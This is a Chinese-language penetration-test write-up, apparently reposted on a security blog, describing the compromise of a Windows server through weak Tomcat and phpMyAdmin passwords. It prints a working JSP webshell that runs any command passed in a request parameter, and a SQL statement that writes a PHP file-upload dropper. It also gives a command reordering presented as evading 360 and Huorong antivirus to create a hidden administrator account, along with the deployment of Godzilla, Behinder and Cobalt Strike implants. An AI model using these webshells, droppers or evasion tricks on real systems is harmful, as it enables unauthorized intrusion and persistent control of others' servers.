【知识积累】遇到Tomcat和phpmyadmin的一次渗透

admin 2022年1月10日03:34:07评论76 views字数 1514阅读5分2秒阅读模式

前言

  • 简单的渗透测试

开始

简单的看一下信息,发现ThinkPHP

看一看版本,3.2.3,百度搜了下,好像是可以反序列化注入,先放着,再搜集一下信息

把图片路径去掉,会发现个目录遍历,还没想到利用方式,没找到admin目录,信息越多突破口才更好找

再用nmapAutomator扫一波网站的端口信息,不错,开了3306,还有tomcat

直接去tomcat,常规的测试一下put,有可能开了readonly,但是没有,不允许

Tomcat弱口令

然后弱密码,登陆试试,惊喜,进了。可以直接war打包getshell了

其实这时还有个,就是上面指纹识别的多了一些信息,因为之前不是检测端口开放了3306吗,没想到tomcat上面会识别到phpmyadmin管理数据库,之前用网站目录没扫出来,估计域名访问的是ip:80/xx/index.php,所以现在直接用ip:8080访问就扫出来了吧,这时能拿shell的方法又有其他的可以尝试。

先试试这个了,先添加一个一句话木马

1
<% if("023".equals(request.getParameter("pwd"))){ java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("i")).getInputStream(); int a = -1; byte[] b = new byte[2048]; out.print("<pre>"); while((a=in.read(b))!=-1){ out.println(new String(b)); } out.print("</pre>"); } %>

用jar打个包,简单理解一下 c是create,v是详细的意思不知道啥单词,f是file指定创建的war

接着上传就ok了

他会把cmd.war解压成cmd/1.jsp,我们访问这个路径就可以看到了

高权限,随即我执行命令,发现被拦截了,看了看进程,发现360

接着网上搜了个大马,试试能不能绕过,同样方法,上传大马,确实有个360

上传cs免杀马,结果自己做的太大了,算了,上传哥斯拉马,哥斯拉搞起

想上传cs马,结果没权限,因为没法上传文件

过360创建用户

这里写一个自己构造的bypass360创建用户的方法,可以进去人工关360

1
2
3
4
5
正常来写 
net user test$ Redteam123 /add 这样肯定会被360拦截,但是换一个写法

改写之后
net /add user test$ Redteam123 这样就能成功创建用户,亲测可以绕过360和火绒创建用户

PHPmyadmin方法记录

这里回到网站,另一种方法也记录一下,好久没碰phpmyadmin,在tomcat中检查指纹的时候,爆出有phpmyadmin,我们访问看看,我还想着是不是要利用刚刚拿到的shell去找mysql密码,结果root root就进去了。弱密码tql

还是基础操作,日志getshell,简单的猜一下目录

但是访问不进去

我怀疑是被杀了,上传个冰蝎马,思路是利用file_put_contents来post传上去

1
SELECT "<?php file_put_contents($_GET['name'],$_POST['ma']);?>"

然后发现可以访问了,接着利用这个写入要url编码一下冰蝎马,或者哥斯拉马,这里用冰蝎了

成功连上冰蝎

这次继续上cs马,没想到上去了,我做了个木马,太大了2Mo(╥﹏╥)o,太菜了

接着执行一下就上线了

结束

我的个人博客

孤桜懶契:http://gylq.gitee.io

FROM:gylq.gitee Author:孤桜懶契

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年1月10日03:34:07
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   【知识积累】遇到Tomcat和phpmyadmin的一次渗透http://cn-sec.com/archives/730042.html

发表评论

匿名网友 填写信息